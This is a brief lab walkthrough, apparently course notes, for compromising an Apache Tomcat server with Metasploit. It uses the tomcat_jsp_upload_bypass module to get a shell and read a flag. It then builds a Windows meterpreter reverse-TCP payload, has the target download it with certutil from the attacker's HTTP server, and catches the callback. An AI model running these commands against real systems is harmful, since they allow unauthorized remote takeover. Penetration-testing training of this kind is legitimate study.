🔬Tomcat - MSF Exploit
Lab 1
Target IP:
10.2.24.113
Exploit the target with the appropriate Metasploit Framework module
service postgresql start && msfconsole -q
db_status
setg RHOSTS 10.2.24.113
setg RHOST 10.2.24.113
workspace -a TOMCAT
Perform an
nmap
scan directly into MSF
db_nmap -sS -sV -O 10.2.24.113

Try tomcat from a browser
http://10.2.24.113:8080/
services
search type:exploit tomcat_jsp
use exploit/multi/http/tomcat_jsp_upload_bypass
info
# Description:
# This module uploads a jsp payload and executes it.
check
run
Or use a specific payload
set payload java/jsp_shell_bind_tcp
options
set SHELL cmd
run
A CMD shell session is provided
cd /
type flag.txt
Obtain a
Meterpreter
session
background
sessions
Generate a Windows
meterpreter
payload. Open a new terminal tab
ip -br -c a
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.18.2 LPORT=1234 -f exe > meterpreter.exe
sudo python3 -m http.server 80
In the first
msfconsole
tab
sessions
sessions 2
certutil -urlcache -f http://10.10.18.2/meterpreter.exe meterpreter.exe
Terminate the python web server and set up the handler in the second tab
vim handler.rc
# Insert the following lines
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.10.18.2
set LPORT 1234
run
# Save it and exit
msfconsole -r handler.rc
Execute the
meterpreter.exe
on the target system
.\meterpreter.exe
Reverse
Meterpreter
session will be opened.
Last updated
Was this helpful?